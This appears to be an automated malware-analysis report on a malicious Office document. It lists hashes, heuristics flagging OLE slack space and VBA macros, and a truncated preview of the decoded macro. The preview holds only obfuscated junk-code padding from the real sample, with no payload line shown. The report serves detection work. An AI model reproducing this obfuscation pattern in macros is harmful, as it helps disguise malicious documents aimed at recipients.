Office (OLE) malware analysis — malicious · 642c879477d3fee0

MALICIOUS

Office (OLE)

146.8 KB First seen: 2019-09-30

MD5: fa00b350189d3775807064a7133d91cd SHA-1: a3b123f2de764e5d3055425e94590e3cf53b2fb7 SHA-256: 642c879477d3fee0d34c63b65718f4710da02fc6f9e128311263761dfd9f6e11

62 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is an OLE document with a significant amount of slack space and detected VBA macros. The VBA macro code is heavily obfuscated but its presence, combined with the OLE slack anomaly, suggests it is designed to download and execute a secondary payload. The embedded URL, though benign, is a common indicator in macro-based malware.

Heuristics 3

OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY

OLE file is 150,311 bytes but its declared streams total only 52,125 bytes — 98,186 bytes (65%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
VBA macros detected medium OLE_VBA_MACROS

Document contains VBA macro code
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 37791 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	37791 bytes
SHA-256: `214231ebe496ea88f9d2ad986efa2491d8b05cd8d663fa24cd3397575f4085e0`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "BlUkafEw" Private Function AGivahsoE() On Error Resume Next If FThhd = 19 Then Set asHsw = WEXAkU Else Set ojNpw = EWGYcj End If If mRLSGv = 19 Then Set wWLdtq = zviqw Else Set Kqsilw = tTTfI End If If EMDHj And 9 Then If IfJzws And JiIXkN Then Dkioac = Oct(67555 - EIPAo) End If End If If OzjLmD = 19 Then Set YZHDAw = LXfAoY Else Set ZOSVpU = CSibRA End If If ZRcuzw And 9 Then If qRDNH And sZUDrQ Then TdOhD = Oct(94070 - aBivDn) End If End If If qvqNC = 19 Then Set uQkMUz = inLJYU Else Set vCuqCJ = piIJTY End If If ZNdNhZ = 19 Then Set iVjzJ = NXliTk Else Set oAzKs = FibCAY End If End Function Private Function nMhdZWpMBLCs() On Error Resume Next If Lqlmz = 19 Then Set vZjhI = kfDjU Else Set pYKjAM = cUdqS End If If RnwXM = 19 Then Set VkniF = OqHun Else Set DzYSd = VROzuQ End If If cVIct = 19 Then Set DioNf = VClKJ Else Set rJCYN = qYOUzS End If If zBuPW = 19 Then Set mwpHjw = zrUqJ Else Set VbYDD = flUHi End If If fQBTI = 19 Then Set ojitT = oQYqhu Else Set nwNnaw = HqoRqH End If End Function Private Function czksKhLRNZ() On Error Resume Next If qbQju = 19 Then Set dDYozK = BvEYp Else Set ftimr = Cdjsf End If If pwIch = 19 Then Set mEDVf = wJrlzD Else Set XDRazS = YSYBUo End If If XGfpwN = 19 Then Set mZIBn = aVIlGt Else Set DZbHp = MrBwL End If If HmQVGG = 19 Then Set pkGlj = rwhUum Else Set mowfXz = BIkcw End If If snEni = 19 Then Set hiTSpb = hPKhCZ Else Set rSolw = hJhzi End If End Function Private Function lmfXoCMOmujOhu(bPTjczlSfQw) On Error Resume Next If iAmmB = 19 Then Set zJwBwp = jvEQU Else Set YJKsr = jCBqn End If If JiPDn = 19 Then Set CddqWn = dzSYjk Else Set cJzYIu = UlwSI End If If tTrQfS = 19 Then Set vTnEQq = kcGDJh Else Set hrvtSh = hXNfoz End If If TFQhOd = 19 Then Set DicnBT = FwFjM Else Set wWNkCO = aZbtbm End If If zszlDH = 19 Then Set PquqNM = jiQtV Else Set wsjfAi = iCiMP End If End Function Private Function FFvJVDHW() On Error Resume Next If AjSss = 19 Then Set iQKrFM = lVzNN Else Set hbooA = dVkAjo End If If MHniJc = 19 Then Set uccBQ = kVCdu Else Set XnfUZz = HfIfNv End If If TzwrlJ = 19 Then Set dwOjB = lKnYqt Else Set IjMuS = PHwQd End If If XAlWFb = 19 Then Set CEcaH = hrLwbq Else Set GjknDY = twfik End If If VkYRS = 19 Then Set pMEHl = TjYvBo Else Set HdqQwS = HKDYtp End If End Function Private Function QIWiKCjNnz() On Error Resume Next If WpAuzr = 19 Then Set ujnNf = VZlwP Else Set FSNEu = PnVDR End If If sHRuA = 19 Then Set tmuFPp = wZEwdR Else Set YHacv = qswpP End If If zJkqHl = 19 Then Set EFsrd = qGpczR Else Set rwJIk = njDkq End If If liOkj = 19 Then Set LBBAZW = AQJwsF Else Set IkBzb = BziBU End If If XIIrEs = 19 Then Set GVqvk = JFXaEr Else Set OwAhPJ = cNXAfX End If End Function Private Function NPJJrwU() On Error Resume Next If YYYicc = 19 Then Set AaKwQO = zJBzu Else Set TiBWA = zWCDBR End If If Dvlsvf = 19 Then Set NUAjuS = UWsDQ Else Set HpXBd = fbzXIj End If If bATij = 19 Then Set TDCGji = hpzmvB Else Set EqCzpj = vmmSt End If If MFMaUq = 19 Then Set zCcRGb = JWXIj Else Set uLiLj = TfuBK End If If zb ... (truncated)

SHA-256: 214231ebe496ea88f9d2ad986efa2491d8b05cd8d663fa24cd3397575f4085e0

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "BlUkafEw"
Private Function AGivahsoE()
On Error Resume Next
   If FThhd = 19 Then
      Set asHsw = WEXAkU
      Else
      Set ojNpw = EWGYcj
   End If
   If mRLSGv = 19 Then
      Set wWLdtq = zviqw
      Else
      Set Kqsilw = tTTfI
   End If
   If EMDHj And 9 Then
      If IfJzws And JiIXkN Then
         Dkioac = Oct(67555 - EIPAo)
      End If
   End If
   If OzjLmD = 19 Then
      Set YZHDAw = LXfAoY
      Else
      Set ZOSVpU = CSibRA
   End If
   If ZRcuzw And 9 Then
      If qRDNH And sZUDrQ Then
         TdOhD = Oct(94070 - aBivDn)
      End If
   End If
   If qvqNC = 19 Then
      Set uQkMUz = inLJYU
      Else
      Set vCuqCJ = piIJTY
   End If
   If ZNdNhZ = 19 Then
      Set iVjzJ = NXliTk
      Else
      Set oAzKs = FibCAY
   End If
End Function
Private Function nMhdZWpMBLCs()
On Error Resume Next
   If Lqlmz = 19 Then
      Set vZjhI = kfDjU
      Else
      Set pYKjAM = cUdqS
   End If
   If RnwXM = 19 Then
      Set VkniF = OqHun
      Else
      Set DzYSd = VROzuQ
   End If
   If cVIct = 19 Then
      Set DioNf = VClKJ
      Else
      Set rJCYN = qYOUzS
   End If
   If zBuPW = 19 Then
      Set mwpHjw = zrUqJ
      Else
      Set VbYDD = flUHi
   End If
   If fQBTI = 19 Then
      Set ojitT = oQYqhu
      Else
      Set nwNnaw = HqoRqH
   End If
End Function
Private Function czksKhLRNZ()
On Error Resume Next
   If qbQju = 19 Then
      Set dDYozK = BvEYp
      Else
      Set ftimr = Cdjsf
   End If
   If pwIch = 19 Then
      Set mEDVf = wJrlzD
      Else
      Set XDRazS = YSYBUo
   End If
   If XGfpwN = 19 Then
      Set mZIBn = aVIlGt
      Else
      Set DZbHp = MrBwL
   End If
   If HmQVGG = 19 Then
      Set pkGlj = rwhUum
      Else
      Set mowfXz = BIkcw
   End If
   If snEni = 19 Then
      Set hiTSpb = hPKhCZ
      Else
      Set rSolw = hJhzi
   End If
End Function
Private Function lmfXoCMOmujOhu(bPTjczlSfQw)
On Error Resume Next
   If iAmmB = 19 Then
      Set zJwBwp = jvEQU
      Else
      Set YJKsr = jCBqn
   End If
   If JiPDn = 19 Then
      Set CddqWn = dzSYjk
      Else
      Set cJzYIu = UlwSI
   End If
   If tTrQfS = 19 Then
      Set vTnEQq = kcGDJh
      Else
      Set hrvtSh = hXNfoz
   End If
   If TFQhOd = 19 Then
      Set DicnBT = FwFjM
      Else
      Set wWNkCO = aZbtbm
   End If
   If zszlDH = 19 Then
      Set PquqNM = jiQtV
      Else
      Set wsjfAi = iCiMP
   End If
End Function
Private Function FFvJVDHW()
On Error Resume Next
   If AjSss = 19 Then
      Set iQKrFM = lVzNN
      Else
      Set hbooA = dVkAjo
   End If
   If MHniJc = 19 Then
      Set uccBQ = kVCdu
      Else
      Set XnfUZz = HfIfNv
   End If
   If TzwrlJ = 19 Then
      Set dwOjB = lKnYqt
      Else
      Set IjMuS = PHwQd
   End If
   If XAlWFb = 19 Then
      Set CEcaH = hrLwbq
      Else
      Set GjknDY = twfik
   End If
   If VkYRS = 19 Then
      Set pMEHl = TjYvBo
      Else
      Set HdqQwS = HKDYtp
   End If
End Function
Private Function QIWiKCjNnz()
On Error Resume Next
   If WpAuzr = 19 Then
      Set ujnNf = VZlwP
      Else
      Set FSNEu = PnVDR
   End If
   If sHRuA = 19 Then
      Set tmuFPp = wZEwdR
      Else
      Set YHacv = qswpP
   End If
   If zJkqHl = 19 Then
      Set EFsrd = qGpczR
      Else
      Set rwJIk = njDkq
   End If
   If liOkj = 19 Then
      Set LBBAZW = AQJwsF
      Else
      Set IkBzb = BziBU
   End If
   If XIIrEs = 19 Then
      Set GVqvk = JFXaEr
      Else
      Set OwAhPJ = cNXAfX
   End If
End Function
Private Function NPJJrwU()
On Error Resume Next
   If YYYicc = 19 Then
      Set AaKwQO = zJBzu
      Else
      Set TiBWA = zWCDBR
   End If
   If Dvlsvf = 19 Then
      Set NUAjuS = UWsDQ
      Else
      Set HpXBd = fbzXIj
   End If
   If bATij = 19 Then
      Set TDCGji = hpzmvB
      Else
      Set EqCzpj = vmmSt
   End If
   If MFMaUq = 19 Then
      Set zCcRGb = JWXIj
      Else
      Set uLiLj = TfuBK
   End If
   If zb
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.